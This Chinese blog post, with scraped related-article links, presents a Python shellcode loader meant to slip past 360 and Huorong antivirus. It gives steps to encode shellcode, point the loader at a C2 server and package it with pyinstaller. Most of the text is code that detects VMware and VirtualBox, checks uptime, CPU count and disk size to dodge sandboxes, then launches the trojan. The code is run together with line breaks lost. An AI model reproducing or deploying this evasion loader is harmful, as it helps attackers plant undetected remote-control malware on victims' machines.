2023最新使用python进行shellcode免杀过360火绒，反虚拟机

本源码仅供学习交流，不得用于违法范围，本源码已放到QQ交流群群文件中QQ群：798134185

反虚拟机方案根据虚拟机系统文件 cpu核心数开机启动时间 c盘大小判断

生成c语言的payload使用encode.py进行加密

import pybase100# 这里填入你的shellcode
shellcode = b''
# 输出密文
print(pybase100.encode(shellcode).decode())

python版本3.11

修改main.py的IP地址为c2服务器地址

import shell
import os
import shutil
from psutil import boot_time
import time
from time import time
from ping3 import ping, verbose_ping
host = '192.168.100.1'
'''填写你服务器ip'''
src_addr = None
res =0
def ping_some_ip(host,src_addr=None):second = ping(host,src_addr=src_addr)return second
while res <=3:result = ping_some_ip(host, src_addr)if result is None:res=res+1breakelse:exit()
count = os.cpu_count()
bootTime = (time()-boot_time())/3600
total_size = shutil.disk_usage("C:\\").total
total_size = total_size / (1024 * 1024)
file_1 = os.path.exists("C:\windows\System32\Drivers\Vmmouse.sys")
file_2 = os.path.exists("C:\windows\System32\Drivers\vmtray.dll")
file_3 = os.path.exists("C:\windows\System32\Drivers\VMToolsHook.dll")
file_4 = os.path.exists("C:\windows\System32\Drivers\vmmousever.dll")
file_5 = os.path.exists("C:\windows\System32\Drivers\vmhgfs.dll")
file_6 = os.path.exists("C:\windows\System32\Drivers\vmGuestLib.dll")
file_7 = os.path.exists("C:\windows\System32\Drivers\VBoxMouse.sys")
file_8 = os.path.exists("C:\windows\System32\Drivers\VBoxGuest.sys")
file_9 = os.path.exists("C:\windows\System32\Drivers\VBoxSF.sys")
file_10 = os.path.exists("C:\windows\System32\Drivers\VBoxVideo.sys")
file_11= os.path.exists("C:\windows\System32\vboxdisp.dll")
file_12= os.path.exists("C:\windows\System32\vboxhook.dll")
file_13= os.path.exists("C:\windows\System32\vboxoglerrorspu.dll")
file_14= os.path.exists("C:\windows\System32\vboxoglpassthroughspu.dll")
file_15= os.path.exists("C:\windows\System32\vboxservice.exe")
file_16= os.path.exists("C:\windows\System32\vboxtray.exe")
file_17= os.path.exists("C:\windows\System32\VBoxControl.exe")
print('1')
'''检测是否为虚拟机'''
if file_1 or file_2 or file_17 or file_16 or file_15 or file_14 or file_13 or file_12 or file_11 or file_9 or file_8 or file_10 or file_7 or file_6 or file_5 or file_4 or file_3 :exit()
else :if bootTime <= 0.5:time.sleep(100)if count < 4:time.sleep(100)if total_size <= 50 * 1024:print(total_size)time.sleep(100)else:shell.main()'''检查开机时间是否大于半小时  检查cpu核心是否小于4，c盘容量是否小于50g如果都满足说明可能是沙盒或者虚拟机，延迟执行木马'''

将加密的shellcode复制到shell.py中进行替换

使用pyinstaller进行打包

完整代码在QQ群文件：QQ群：798134185

bypass火绒 360

2023最新使用python进行shellcode免杀过360火绒，反虚拟机相关推荐

Powershell 免杀过 defender 火绒，附自动化工具
技术交流关注微信公众号 Z20安全团队 , 回复加群 ,拉你入群一起讨论技术. 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看. powershell执行策略修改 1 获取 Powe ...
python加载shellcode免杀简介
目录前言 0X00 基础概念 1. python ctypes模块介绍 2. dll动态链接库 3. pyinstaller 4. shellcode 5.关于windows defender 6 ...
Python shellcode免杀
浅谈Python shellcode免杀一．前言在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长.很多师傅好用的开源免杀项目公布出来的同时几乎也就意味它的失效,对于一些和我一样对系统底 ...
远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)
0x00 免杀能力一览表几点说明: 1.表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/mete ...
Shellcode免杀，绕过360安全卫士、火绒安全、腾讯管家
前言分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷杀毒原理 360.腾讯电脑管家.火绒剑.金山毒霸.瑞星等等,这几个杀毒软件领头羊,现在 ...
免杀入门---shellcode免杀
前言本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担. 基础概念免杀免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能 ...
MSF外网渗透+shellcode免杀
1. 内网穿透使用的Sunny-Ngrok服务 .你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定. 官网链接:https://www.ngrok.cc/( ...
【Windows】Shellcode免杀，过360、火绒、Defender 静态及主防
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...
【工具分享】免杀360火绒的shellcode加载器
微信公众号:乌鸦安全扫取二维码获取更多信息! 1. 免杀效果该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...

2023最新使用python进行shellcode免杀过360火绒，反虚拟机

2023最新使用python进行shellcode免杀过360火绒，反虚拟机相关推荐

最新文章

热门文章

2023最新使用python进行shellcode免杀过360火绒 ，反虚拟机

2023最新使用python进行shellcode免杀过360火绒 ，反虚拟机相关推荐

最新文章

热门文章

2023最新使用python进行shellcode免杀过360火绒，反虚拟机

2023最新使用python进行shellcode免杀过360火绒，反虚拟机相关推荐